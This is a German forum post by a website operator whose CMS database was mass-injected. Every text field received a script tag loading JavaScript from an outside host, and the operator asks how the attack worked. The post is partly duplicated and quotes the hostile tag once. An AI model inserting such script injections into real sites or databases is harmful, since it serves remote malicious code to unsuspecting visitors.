1
Hallo,
mit Erschrecken habe ich heute festgestellt, dass eine unserer Firmenwebsites einem großen Spamangriff zum Opfer gefallen ist. Dass wir nicht die einzigen sind, zeigt diese Google-Suche...
Irgendwie hat es der Angreifer geschafft, in das CMS zu gelangen und an jedes Varchar/Text-Feld den String
Zum Glück haben alle unsere Datenbanken ein tägliches Backup, sodass das Malheur binnen 5min behoben war - es bleibt der bittere Nachgeschmack, dass ich keinen Schimmer habe, wie er da rein kommen konnte, alle Textfelder der Datenbank auszuspionieren imstande war und dann noch Queries absetzen konnte. Wenn ich das bloß wüsste... jemand von euch eine Idee?
Ich gehe ja davon aus, dass ein Angriff zumeist über Formulare ausgeübt wird, wo aus Benutzereingaben Datenbankqueries geformt werden. Die sind aber natürlich alle sorgfältig escaped und decken mit Sicherheit nicht die gesamte Datenbank ab, sondern nur eine Tabelle (die der Newsletter-Anmeldung, wo Name und Empfänger gespeichert werden). Aber der Spammer hat tatsächlich ALLE Tabellen (bis auf die CMS-Benutzer) gefunden und manipuliert. Wie ist das bloß möglich?
mit Erschrecken habe ich heute festgestellt, dass eine unserer Firmenwebsites einem großen Spamangriff zum Opfer gefallen ist. Dass wir nicht die einzigen sind, zeigt diese Google-Suche...
Irgendwie hat es der Angreifer geschafft, in das CMS zu gelangen und an jedes Varchar/Text-Feld den String
<script src=http://www.banner82.com/b.js></script>
dranzuhängen - natürlich in der Hoffnung, dass irgendwo auf der Seite etwas ausgegeben wird, was nicht HTML-Kodiert wird - das hat er auch geschafft.Zum Glück haben alle unsere Datenbanken ein tägliches Backup, sodass das Malheur binnen 5min behoben war - es bleibt der bittere Nachgeschmack, dass ich keinen Schimmer habe, wie er da rein kommen konnte, alle Textfelder der Datenbank auszuspionieren imstande war und dann noch Queries absetzen konnte. Wenn ich das bloß wüsste... jemand von euch eine Idee?
Ich gehe ja davon aus, dass ein Angriff zumeist über Formulare ausgeübt wird, wo aus Benutzereingaben Datenbankqueries geformt werden. Die sind aber natürlich alle sorgfältig escaped und decken mit Sicherheit nicht die gesamte Datenbank ab, sondern nur eine Tabelle (die der Newsletter-Anmeldung, wo Name und Empfänger gespeichert werden). Aber der Spammer hat tatsächlich ALLE Tabellen (bis auf die CMS-Benutzer) gefunden und manipuliert. Wie ist das bloß möglich?